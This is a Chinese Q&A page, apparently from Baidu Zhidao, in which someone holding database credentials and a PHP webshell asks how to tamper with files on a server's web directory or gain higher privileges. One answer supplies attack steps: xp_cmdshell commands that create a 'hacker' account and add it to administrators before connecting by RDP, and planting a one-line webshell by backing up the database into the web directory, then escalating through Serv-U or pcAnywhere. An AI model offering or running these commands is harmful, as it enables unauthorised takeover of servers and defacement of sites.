mysql求答
来源:百度知道 编辑:UC知道 时间:2024/05/21 11:38:40
比如有个mysql数据库的 帐号和密码 ,连接后
执行哪些命令 可以操作 web目录下的文件 比如编辑index.htm 删除index.htm 移动 上传 等命令
下面的回答不行, php没权限呀, php的shell都有 但编辑 删除 移动 都失败, mysql可能权限大点 有办法利用mysql 操作页面 或者提php权限吗?
执行哪些命令 可以操作 web目录下的文件 比如编辑index.htm 删除index.htm 移动 上传 等命令
下面的回答不行, php没权限呀, php的shell都有 但编辑 删除 移动 都失败, mysql可能权限大点 有办法利用mysql 操作页面 或者提php权限吗?
..都有了这个了还不好说?拿下服务器的最高权限都有很大的希望。
1、SA权限的,直接exec master.dbo.xp_cmdshell 'net user hacker hacker /add';
;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add';
连接3389,OK了。如果XP_cmdshell 被删除了可以试着恢复,不行的话可以用沙盘模式添加系统用户。
2、DBO权限,先拿个webshell再说吧。
数据库插入一句话,然后备份到Web目录。一般的webshell都拥有对web目录下文件的编辑权限的。
然后看服务器上装没装ser-u,pcanywhwere等,有的话可以试试提权。
总之,命令是死的,人是活的,要学会灵活运用。
mysql是数据库,要达到你的目的,你得用php
通常,如果设置了PHP不能操作文件,MYSQL也一定被设置了。